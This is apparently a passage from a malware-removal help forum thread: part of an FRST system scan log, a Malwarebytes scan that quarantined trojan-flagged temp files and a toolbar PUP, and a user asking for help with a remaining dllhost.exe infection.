{9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.) 
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office 15\root\Office15\URLREDIR.DLL (Microsoft Corporation) BHO: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office 15\root\Office15\GROOVEEX.DLL (Microsoft Corporation) BHO-x32: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX86\Microsoft Office\Office15\OCHelper.dll (Microsoft Corporation) BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.) BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX86\Microsoft Office\Office15\URLREDIR.DLL (Microsoft Corporation) BHO-x32: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX86\Microsoft Office\Office15\GROOVEEX.DLL (Microsoft Corporation) DPF: HKLM-x32 {0D41B8C5-2599-4893-8183-00195EC8D5F9} http://support.asus.com/select/asusTek_sys_ctrl3.cab DPF: HKLM-x32 {F27237D7-93C8-44C2-AC6E-D6057B9A918F} https://blueconnect.jetblue.com/dana-cached/sc/JuniperSetupClient.cab Handler: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - C:\Program Files\Microsoft Office 15\root\Office15\MSOSB.DLL (Microsoft Corporation) Handler-x32: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX86\Microsoft Office\Office15\MSOSB.DLL (Microsoft Corporation) Tcpip\Parameters: [DhcpNameServer] 209.18.47.61 209.18.47.62 FireFox: ======== FF Plugin: @microsoft.com/GENUINE -> disabled No File FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office 15\root\Office15\NPSPWRAP.DLL (Microsoft Corporation) FF Plugin-x32: 
@Apple.com/iTunes,version=1.0 -> E:\iTunes\Mozilla Plugins\npitunes.dll () FF Plugin-x32: @canon.com/MycameraPlugin -> C:\Program Files (x86)\Canon\MyCamera Download Plugin\NPCIG.dll (CANON INC.) FF Plugin-x32: @Google.com/GoogleEarthPlugin -> C:\Program Files (x86)\Google\Google Earth\plugin\npgeplugin.dll (Google) FF Plugin-x32: @google.com/npPicasa3,version=3.0.0 -> C:\Program Files (x86)\Google\Picasa3\npPicasa3.dll (Google, Inc.) FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX86\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll (Microsoft Corporation) FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX86\Microsoft Office\Office15\NPSPWRAP.DLL (Microsoft Corporation) FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3528.0331 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation) FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll (NVIDIA Corporation) FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll (NVIDIA Corporation) FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.) FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.) FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.) FF Plugin HKU\S-1-5-21-4134620719-2527629264-1752102789-1000: @tools.google.com/Google Update;version=3 -> C:\Users\Swintal\AppData\Local\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.) 
FF Plugin HKU\S-1-5-21-4134620719-2527629264-1752102789-1000: @tools.google.com/Google Update;version=9 -> C:\Users\Swintal\AppData\Local\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.) Chrome: ======= CHR HomePage: Default -> hxxp://www.google.com CHR StartupUrls: Default -> "hxxp://www.google.com" CHR Profile: C:\Users\Swintal\AppData\Local\Google\Chrome\User Data\Default CHR Extension: (Google Drive) - C:\Users\Swintal\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2014-03-16] CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Users\Swintal\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-09-13] CHR Extension: (DoNotTrackMe: Online Privacy Protection) - C:\Users\Swintal\AppData\Local\Google\Chrome\User Data\Default\Extensions\epanfjkfahimkgomnigadpkobaefekcd [2014-07-18] CHR Extension: (iCloud Bookmarks) - C:\Users\Swintal\AppData\Local\Google\Chrome\User Data\Default\Extensions\fkepacicchenbjecpbpbclokcabebhah [2014-10-03] CHR Extension: (Hide My Ass) - C:\Users\Swintal\AppData\Local\Google\Chrome\User Data\Default\Extensions\jmjonpeiaiacbgfgemlchebljmfgjnmh [2014-07-18] CHR Extension: (Application Launcher for Drive (by Google)) - C:\Users\Swintal\AppData\Local\Google\Chrome\User Data\Default\Extensions\lmjegmlicamnimmfhcmpkclmigmmcbeh [2014-11-06] CHR Extension: (WeatherBug) - C:\Users\Swintal\AppData\Local\Google\Chrome\User Data\Default\Extensions\njkkjobcechefaoknodniidfjapgfoco [2014-07-18] CHR Extension: (Google Wallet) - C:\Users\Swintal\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2014-03-01] ==================== Services (Whitelisted) ================= (If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.) 
R2 asComSvc; C:\Program Files (x86)\ASUS\AXSP\1.01.01\atkexComSvc.exe [927232 2012-10-29] () R2 ClickToRunSvc; C:\Program Files\Microsoft Office 15\ClientX64\OfficeClickToRun.exe [2436280 2014-09-25] (Microsoft Corporation) R2 ekrn; C:\Program Files\ESET\ESET Smart Security\x86\ekrn.exe [1349576 2014-10-01] (ESET) R2 Garmin Core Update Service; C:\Program Files (x86)\Garmin\Core Update Service\Garmin.Cartography.MapUpdate.CoreService.exe [438616 2014-07-23] (Garmin Ltd or its subsidiaries) R2 GfExperienceService; C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe [1148744 2014-11-06] (NVIDIA Corporation) S3 IDriverT; C:\Program Files (x86)\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe [69632 2005-04-04] (Macrovision Corporation) [File not signed] R2 MBAMScheduler; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe [1871160 2014-10-01] (Malwarebytes Corporation) R2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [968504 2014-10-01] (Malwarebytes Corporation) [File not signed] R2 NvNetworkService; C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe [1795912 2014-11-06] (NVIDIA Corporation) R2 NvStreamSvc; C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe [19819848 2014-11-06] (NVIDIA Corporation) ==================== Drivers (Whitelisted) ==================== (If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.) 
R0 asahci64; C:\Windows\System32\DRIVERS\asahci64.sys [47512 2013-01-10] (Asmedia Technology) R1 AsIO; C:\Windows\SysWow64\drivers\AsIO.sys [15232 2012-08-21] () R3 e1dexpress; C:\Windows\System32\DRIVERS\e1d62x64.sys [496400 2013-02-26] (Intel Corporation) R1 eamonm; C:\Windows\System32\DRIVERS\eamonm.sys [243440 2014-08-18] (ESET) U5 edevmon; C:\Windows\System32\Drivers\edevmon.sys [241368 2014-08-18] (ESET) R1 ehdrv; C:\Windows\System32\DRIVERS\ehdrv.sys [169280 2014-08-18] (ESET) R2 epfw; C:\Windows\System32\DRIVERS\epfw.sys [222280 2014-08-18] (ESET) R1 EpfwLWF; C:\Windows\System32\DRIVERS\EpfwLWF.sys [44632 2014-08-18] (ESET) R0 epfwwfp; C:\Windows\System32\DRIVERS\epfwwfp.sys [63160 2014-09-18] (ESET) R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [25816 2014-10-01] (Malwarebytes Corporation) R3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [129752 2014-11-11] (Malwarebytes Corporation) R3 MBAMWebAccessControl; C:\Windows\system32\drivers\mwac.sys [63704 2014-10-01] (Malwarebytes Corporation) R3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [19784 2014-11-06] (NVIDIA Corporation) R3 nvvad_WaveExtensible; C:\Windows\System32\drivers\nvvad64v.sys [38216 2014-10-03] (NVIDIA Corporation) R3 SaiH075C; C:\Windows\System32\DRIVERS\SaiH075C.sys [326784 2006-07-27] (Saitek) S3 Serial; C:\Windows\system32\drivers\serial.sys [94208 2009-07-13] (Brother Industries Ltd.) ==================== NetSvcs (Whitelisted) =================== (If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.) ==================== One Month Created Files and Folders ======== (If an entry is included in the fixlist, the file\folder will be moved.) 
  4. Here is the Malwarebytes Anti-Malware scan

     Malwarebytes Anti-Malware
     www.malwarebytes.org

     Scan Date: 11/11/2014
     Scan Time: 3:46:02 PM
     Logfile: malwarebytes.txt
     Administrator: Yes

     Version: 2.00.3.1025
     Malware Database: v2014.11.11.08
     Rootkit Database: v2014.11.11.01
     License: Trial
     Malware Protection: Enabled
     Malicious Website Protection: Enabled
     Self-protection: Disabled

     OS: Windows 7 Service Pack 1
     CPU: x64
     File System: NTFS
     User: Swintal

     Scan Type: Threat Scan
     Result: Completed
     Objects Scanned: 428473
     Time Elapsed: 20 min, 45 sec

     Memory: Enabled
     Startup: Enabled
     Filesystem: Enabled
     Archives: Enabled
     Rootkits: Disabled
     Heuristics: Enabled
     PUP: Enabled
     PUM: Enabled

     Processes: 0
     (No malicious items detected)

     Modules: 0
     (No malicious items detected)

     Registry Keys: 33

     Registry Values: 2
     PUP.Optional.CouponBar.A, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\TOOLBAR|{8660E5B3-6C41-44DE-8503-98D99BBECD41}, Quarantined, [c6bebd7dc4b853e313eb882e8d75eb15],
     PUP.Optional.CouponBar.A, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\TOOLBAR\{8660E5B3-6C41-44DE-8503-98D99BBECD41}, Quarantined, [394bb684f488b383c8367b3b8d758080],

     Registry Data: 0
     (No malicious items detected)

     Folders: 0
     (No malicious items detected)

     Files: 3
     Trojan.Ransom.ED, C:\Users\Swintal\AppData\Local\Temp\2A9C.tmp, Quarantined, [404476c47b015cdab8b442a036cb8080],
     Trojan.Agent, C:\Users\Swintal\AppData\Local\Temp\FlyTampa_Libraries_FSX_P3D.exe, Quarantined, [8bf998a2413bd363f57b8bd7f0103ac6],
     Trojan.Ransom.ED, C:\Users\Swintal\AppData\Local\Temp\2B47.tmp, Quarantined, [800484b6c5b7d660de8ea939738e867a],

     Physical Sectors: 0
     (No malicious items detected)

     (end)
  5. I'm afraid I too must join those who are having an issue with this piece of malware. I ran the Malwarebytes Anti-Malware scanner and it removed several issues, but the COM Surrogate dllhost.exe*32 issue still remains. Any help that can be provided will be extremely helpful! Thanks, Brian Addition.txt FRST.txt